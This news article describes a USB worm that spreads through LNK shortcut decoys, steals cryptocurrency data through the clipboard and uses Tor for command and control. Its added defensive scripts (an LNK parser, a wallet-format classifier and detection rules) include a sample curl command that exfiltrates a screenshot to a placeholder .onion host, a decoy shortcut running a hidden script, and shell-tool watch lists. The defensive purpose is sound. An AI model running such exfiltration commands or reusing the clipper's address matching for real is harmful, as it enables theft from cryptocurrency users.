USB worm spreads crypto-stealing malware via Windows shortcut files

At a glance:

  • USB drives distributing LNK files are the primary infection vector for this malware
  • Clipboard-stealing functionality targets cryptocurrency wallet addresses and seed phrases
  • Tor network usage enables covert communication and command-and-control operations

Infection Mechanism

The malware propagates through USB drives by abusing Windows shortcut (LNK) files rather than any vulnerability: a shortcut can name a script host or shell as its target, so opening it runs the attacker's command. When a victim opens an infected LNK file, the malware executes and scans the local system for document files. It then replaces legitimate documents with malicious shortcuts bearing identical names, so the next attempt to open one of those documents runs the malware instead. A scheduled task watches for new USB connections, copies the malware to each removable drive and plants further LNK decoys on it. This self-replicating cycle lets the worm move between machines on physical media, including machines that share no network.

The malware uses standard Windows APIs to conceal its activity. After initial execution it contacts its command-and-control (C2) server over Tor at a .onion address, and a scheduled task provides persistence so the malware is reactivated after reboots. Propagation depends on social engineering rather than on a flaw in Windows: a shortcut simply launches whatever target it names, so the worm only needs a user to open a shortcut that looks like a document.
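The decoy pattern above can be checked on a mounted drive without opening anything. The following Python script is an added example (not code from the research or the malware) that reads the fixed header and StringData section of the MS-SHLLINK format and flags a shortcut when its target is a script host or shell, when its name is a document name with .lnk appended, or when its icon is borrowed from an Office or PDF application. The icon heuristic, the script-path and icon strings, and the sample shortcuts are assumptions constructed for the demo; the two blobs are built in memory so the script runs offline.

```python
"""Triage .lnk files for the document-decoy pattern described above.

Minimal reader for the MS-SHLLINK layout (fixed 76-byte header plus the
StringData section); IDList and LinkInfo are skipped by their size fields.
"""
import os
import re
import struct

HEADER_SIZE = 0x4C
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relpath"),
                 (HAS_WORKING_DIR, "workdir"), (HAS_ARGUMENTS, "args"),
                 (HAS_ICON_LOCATION, "icon"))

# Hosts the article names as suspicious when a shortcut launches them.
SCRIPT_HOSTS = re.compile(r"\b(wscript|cscript|cmd|powershell|pwsh|mshta|curl)(\.exe)?\b", re.I)
# A document name with .lnk appended, e.g. "Invoice.docx.lnk".
DOC_DECOY = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|txt)\.lnk$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a ShellLink blob (empty string if absent)."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink header")
    flags = struct.unpack_from("<I", data, 20)[0]        # HeaderSize(4) + LinkCLSID(16)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:                  # IDListSize(2) + the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                            # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            fields[key] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        fields[key] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


def triage(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut matches the decoy pattern (empty if none)."""
    f = parse_lnk(data)
    reasons = []
    target = (f["relpath"] + " " + f["args"]).strip()
    if SCRIPT_HOSTS.search(target):
        reasons.append("launches a script host or shell: " + target)
    if DOC_DECOY.search(filename):
        reasons.append("document name with .lnk appended")
    if re.search(r"winword|excel|powerpnt|acrord", f["icon"], re.I):   # added heuristic
        reasons.append("icon borrowed from an Office/PDF application")
    return reasons


def scan(root: str) -> list:
    """Walk a mounted drive and report every shortcut with at least one reason."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".lnk"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                try:
                    reasons = triage(fn, fh.read())
                except (ValueError, struct.error):
                    continue
            if reasons:
                hits.append((path, reasons))
    return hits


def build_lnk(relpath: str, args: str = "", icon: str = "") -> bytes:
    """Construct a minimal Unicode .lnk blob (no IDList/LinkInfo) for testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE | (HAS_ICON_LOCATION if icon else 0)
    header = struct.pack("<I", HEADER_SIZE) + bytes(16) + struct.pack("<I", flags) + bytes(52)

    def field(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + field(relpath) + field(args) + (field(icon) if icon else b"")


# Constructed samples: a decoy in the worm's style and an ordinary shortcut.
DECOY = build_lnk(r"..\..\Windows\System32\wscript.exe",
                  r'/b "System Volume Information\update.js"',
                  r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE")
BENIGN = build_lnk(r"..\Documents\Report.docx")

if __name__ == "__main__":
    print(triage("Invoice_Q3.docx.lnk", DECOY))   # three reasons
    print(triage("Report.lnk", BENIGN))           # []
```

Run `scan("E:\\")` against a suspect drive to list every shortcut with its reasons; the parser deliberately reads only the StringData block, so it never resolves or executes the target.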

Data Stealer Capabilities

The malware's stealer component polls the clipboard every 0.5 seconds for cryptocurrency-related data. It targets 12-word and 24-word BIP39 seed phrases, Ethereum private keys, Bitcoin wallet addresses (legacy, P2SH, Bech32 and Taproot formats), and Tron and Monero addresses. When it finds a wallet address it swaps in an attacker-controlled address of the same format (a Bech32 address for a Bech32 address, and so on), so the substitution is not obvious at a glance and the victim pastes the attacker's address into the transaction.
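The format matching that such a clipper needs, and that a defender can reuse to check whether a canary value pasted on a test machine is classified the way the stealer would classify it, is shown below. This is an added example, not the malware's code: the patterns encode the public address formats (prefix, length and alphabet) for every family the article lists, and the BIP39 check is shape-only (12 or 24 lowercase words of 3 to 8 letters) because the 2048-word list is not embedded. The sample values are constructed for the demo and no checksums are verified.

```python
"""Classify a clipboard string into the wallet formats the stealer watches for."""
import re

BASE58 = r"[1-9A-HJ-NP-Za-km-z]"          # Bitcoin alphabet: no 0, O, I, l
BECH32 = r"[02-9ac-hj-np-z]"              # bech32 alphabet: no 1, b, i, o
WORD = re.compile(r"^[a-z]{3,8}$")        # every BIP39 word is 3 to 8 letters

# Order matters: a 0x-prefixed 64-hex private key must not be read as an address.
PATTERNS = (
    ("eth_private_key", re.compile(r"^(0x)?[0-9a-fA-F]{64}$")),
    ("eth_address",     re.compile(r"^0x[0-9a-fA-F]{40}$")),
    ("btc_taproot",     re.compile(rf"^bc1p{BECH32}{{58}}$")),                    # 62 chars
    ("btc_bech32",      re.compile(rf"^bc1q{BECH32}{{38}}({BECH32}{{20}})?$")),   # 42 or 62
    ("btc_p2sh",        re.compile(rf"^3{BASE58}{{25,34}}$")),
    ("btc_legacy",      re.compile(rf"^1{BASE58}{{25,34}}$")),
    ("tron_address",    re.compile(rf"^T{BASE58}{{33}}$")),                       # 34 chars
    ("monero_address",  re.compile(rf"^[48]{BASE58}{{94}}$|^4{BASE58}{{105}}$")), # 95 / 106
)


def classify(text: str):
    """Return the format label for a clipboard value, or None if nothing matches."""
    s = text.strip()
    words = s.split()
    if len(words) in (12, 24) and all(WORD.match(w) for w in words):
        return f"bip39_seed_{len(words)}"
    for name, pattern in PATTERNS:
        if pattern.match(s):
            return name
    return None


def same_format(original: str, replacement: str) -> bool:
    """True when a swap keeps the address family, which is what makes a clipper's swap hard to notice."""
    fmt = classify(original)
    return fmt is not None and fmt == classify(replacement)


# Constructed samples: the shapes are right, the checksums are not checked here.
SAMPLES = {
    "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa": "btc_legacy",
    "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy": "btc_p2sh",
    "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq": "btc_bech32",
    "bc1p" + "qpzry9x8gf2tvdw0s3jn54khce6mua7l" + "qpzry9x8gf2tvdw0s3jn54khce": "btc_taproot",
    "0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe": "eth_address",
    "0x" + "ab" * 32: "eth_private_key",
    "T9yD14Nj9j7xAB4dbGeiX9h8unkKHxuWwb": "tron_address",
    "4" + "AB1" * 31 + "C": "monero_address",
    "abandon " * 11 + "about": "bip39_seed_12",
    "meeting notes for thursday": None,
}


def check_samples() -> dict:
    """Classify every sample; returns {value: label} for comparison with SAMPLES."""
    return {value: classify(value) for value in SAMPLES}


if __name__ == "__main__":
    for value, label in check_samples().items():
        print(f"{label!s:16} {value[:40]}")
```

A clipboard-protection control can be exercised by copying one of these constructed values on an isolated test host and confirming the control reports the same family; `same_format` is the property the attacker relies on, so a monitoring rule that alerts when the pasted value differs from the copied one while still classifying identically is the direct counter.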

In addition to clipboard monitoring, the malware captures five screenshots every 10 seconds and exfiltrates them over Tor using the curl tool. This lets the attackers observe user activity, including wallet interfaces or private key entry. The stealer also supports remote code execution: on receiving an EVAL command it downloads and executes JavaScript payloads from the C2 server, which lets the attackers deploy additional tooling or extend the malware's functionality on a compromised system without pushing a new binary.

Security Recommendations

Microsoft researchers emphasize behavioral analysis as the primary detection method, since signature-based tools may miss this threat. Security teams should monitor process activity involving wscript.exe, cscript.exe, curl, PowerShell, and cmd.exe; a script host spawning curl or a shell is not normal on most endpoints. Unusual child processes of these executables, together with connections to 127.0.0.1:9050 (the tor daemon's default SOCKS port; Tor Browser uses 9150) or other Tor network activity, are strong indicators of infection.

Organizations should deploy detection that analyzes process behavior rather than relying solely on known malware signatures, and the Picus whitepaper highlights breach and attack simulation as a way to confirm that those controls actually fire. Because the malware talks to its C2 over Tor, monitoring for local Tor proxy usage and for .onion connections is critical; .onion names never resolve through ordinary DNS, so a tor process or SOCKS proxy on the host is a prerequisite worth hunting for. Users should be warned that any shortcut on a USB drive named like a document is suspect: Explorer hides the .lnk extension even when other extensions are shown, so the small arrow overlay on the icon is often the only visible clue.
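The process-tree and Tor-proxy indicators above translate directly into detection rules. The Python below is an added example, not Microsoft's detection logic: it runs three rules over constructed Sysmon-style events (process creation and network connection), then rates each host "high" when a process-tree rule and the Tor SOCKS rule both fire. The event field names, the host names, the script path on the E: drive and the placeholder .onion URL are assumptions made for the demo.

```python
"""Behavioural detection for the process and network indicators the article lists."""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"curl.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
TOR_SOCKS_PORTS = {9050, 9150}                 # tor daemon default / Tor Browser default
LOOPBACK = re.compile(r"^(127\.\d+\.\d+\.\d+|::1)$")
SCRIPT_ARG = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: list) -> list:
    """Return one finding dict per rule hit: rule, host, pid, detail."""
    findings = []
    for e in events:
        if e["type"] == "process_create":
            child, parent = image_name(e["image"]), image_name(e["parent_image"])
            # Rule 1: Explorer launching a script host with a script file (the LNK double-click chain).
            if parent == "explorer.exe" and child in SCRIPT_HOSTS and SCRIPT_ARG.search(e["cmdline"]):
                findings.append(dict(rule="explorer_launches_script_host", host=e["host"],
                                     pid=e["pid"], detail=e["cmdline"]))
            # Rule 2: a script host spawning curl, PowerShell or cmd.
            if parent in SCRIPT_HOSTS and child in SHELLS:
                findings.append(dict(rule="script_host_spawns_shell", host=e["host"],
                                     pid=e["pid"], detail=f"{parent} -> {child}: {e['cmdline']}"))
        elif e["type"] == "network_connect":
            # Rule 3: any process talking to a local Tor SOCKS port.
            if LOOPBACK.match(e["dest_ip"]) and e["dest_port"] in TOR_SOCKS_PORTS:
                findings.append(dict(rule="tor_socks_proxy", host=e["host"], pid=e["pid"],
                                     detail=f"{image_name(e['image'])} -> {e['dest_ip']}:{e['dest_port']}"))
    return findings


def severity_by_host(findings: list) -> dict:
    """'high' when a process-tree rule and the Tor rule both fire on a host, else 'medium'."""
    hits = defaultdict(set)
    for f in findings:
        hits[f["host"]].add(f["rule"])
    out = {}
    for host, rules in hits.items():
        tree = bool(rules & {"explorer_launches_script_host", "script_host_spawns_shell"})
        out[host] = "high" if tree and "tor_socks_proxy" in rules else "medium"
    return out


# Constructed sample telemetry; placeholder.onion is not a real C2.
EVENTS = [
    dict(type="process_create", host="WS01", pid=4101, image=r"C:\Windows\System32\wscript.exe",
         parent_image=r"C:\Windows\explorer.exe",
         cmdline=r'wscript.exe /b "E:\System Volume Information\update.js"'),
    dict(type="process_create", host="WS01", pid=4122, image=r"C:\Windows\System32\curl.exe",
         parent_image=r"C:\Windows\System32\wscript.exe",
         cmdline=r'curl.exe --socks5-hostname 127.0.0.1:9050 -F "f=@C:\Users\Public\s1.png" http://placeholder.onion/up'),
    dict(type="network_connect", host="WS01", pid=4122, image=r"C:\Windows\System32\curl.exe",
         dest_ip="127.0.0.1", dest_port=9050),
    dict(type="process_create", host="WS02", pid=880,
         image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         parent_image=r"C:\Windows\explorer.exe", cmdline=r'"WINWORD.EXE" C:\Users\a\Report.docx'),
    dict(type="process_create", host="WS02", pid=912, image=r"C:\Windows\System32\curl.exe",
         parent_image=r"C:\Windows\System32\cmd.exe", cmdline="curl.exe -sI https://example.com/"),
    dict(type="network_connect", host="WS02", pid=912, image=r"C:\Windows\System32\curl.exe",
         dest_ip="203.0.113.10", dest_port=443),
]

if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f["host"], f["rule"], f["detail"])
    print(severity_by_host(evaluate(EVENTS)))   # {'WS01': 'high'}
```

WS02 shows why the correlation step matters: curl run from cmd.exe to a public HTTPS endpoint is routine and produces no finding, while the same binary on WS01 is flagged twice because of who launched it and where it connects.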

Editorial: SiliconFeed is an automated feed; facts are checked against sources, and copy is normalized and lightly edited for readers.

FAQ

How does the USB worm spread?
The malware spreads through LNK (shortcut) files placed on USB drives. When users open these files, the malware executes and replaces legitimate documents with malicious shortcuts. It also copies itself to newly connected USB devices, creating additional LNK files to propagate further.
What specific cryptocurrency data does the malware steal?
The malware targets 12-word and 24-word BIP39 seed phrases, Ethereum private keys, Bitcoin wallet addresses (including legacy, P2SH, Bech32, and Taproot formats), Tron, and Monero addresses. It monitors clipboard contents every 0.5 seconds for these data types and replaces wallet addresses with attacker-controlled ones.
How can organizations detect this malware?
Detection relies on behavioral analysis. Security teams should monitor for suspicious activity involving `wscript.exe`, `cscript.exe`, `curl`, PowerShell, and `cmd.exe`. Unusual child processes, connections to `localhost:9050` (Tor proxy), and Tor network activity are key indicators. Signature-based detection may fail, so behavioral monitoring tools are recommended.
